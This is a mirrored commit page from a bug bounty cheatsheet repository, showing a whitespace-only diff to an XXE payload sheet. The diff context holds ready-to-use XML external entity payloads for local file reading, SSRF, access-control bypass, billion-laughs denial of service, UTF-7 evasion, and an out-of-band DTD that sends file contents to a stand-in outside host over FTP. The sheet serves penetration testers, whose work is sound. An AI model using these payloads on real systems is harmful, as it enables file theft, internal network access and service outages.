Mirrors/bugbounty-cheatsheet
2
0
Fork 0
mirror of https://github.com/EdOverflow/bugbounty-cheatsheet.git synced 2024-11-24 12:03:04 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update xxe.md

Browse source
This commit is contained in:
EdOverflow 2018-01-19 11:35:33 +01:00 committed by GitHub
parent 47c3292888
commit a2068b0f01
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

9
cheatsheets/xxe.md
View file

@ -1,4 +1,5 @@
**LFI Test** **LFI Test**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -7,6 +8,7 @@
``` ```
**Blind LFI test (when first case doesn't return anything)** **Blind LFI test (when first case doesn't return anything)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -16,6 +18,7 @@
``` ```
**Access Control bypass (loading restricted resources - PHP example)** **Access Control bypass (loading restricted resources - PHP example)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -24,6 +27,7 @@
``` ```
**SSRF Test** **SSRF Test**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE foo [ <!DOCTYPE foo [
@ -32,6 +36,7 @@
``` ```
**XEE (XML Entity Expansion - DOS)** **XEE (XML Entity Expansion - DOS)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE lolz [ <!DOCTYPE lolz [
@ -51,12 +56,14 @@
``` ```
**XEE #2 (Remote attack - through external xml inclusion)** **XEE #2 (Remote attack - through external xml inclusion)**
``` ```
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE lolz [ <!DOCTYPE lolz [
<!ENTITY test SYSTEM "https://example.com/entity1.xml">]> <!ENTITY test SYSTEM "https://example.com/entity1.xml">]>
<lolz><lol>3..2..1...&test<lol></lolz> <lolz><lol>3..2..1...&test<lol></lolz>
``` ```
**XXE FTP HTTP Server** **XXE FTP HTTP Server**
https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb
@ -75,7 +82,9 @@ File stored on http://publicServer.com/parameterEntity_sendftp.dtd
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>"> <!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1; %param1;
``` ```
**XXE UTF-7** **XXE UTF-7**
``` ```
<?xml version="1.0" encoding="UTF-7"?> <?xml version="1.0" encoding="UTF-7"?>
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4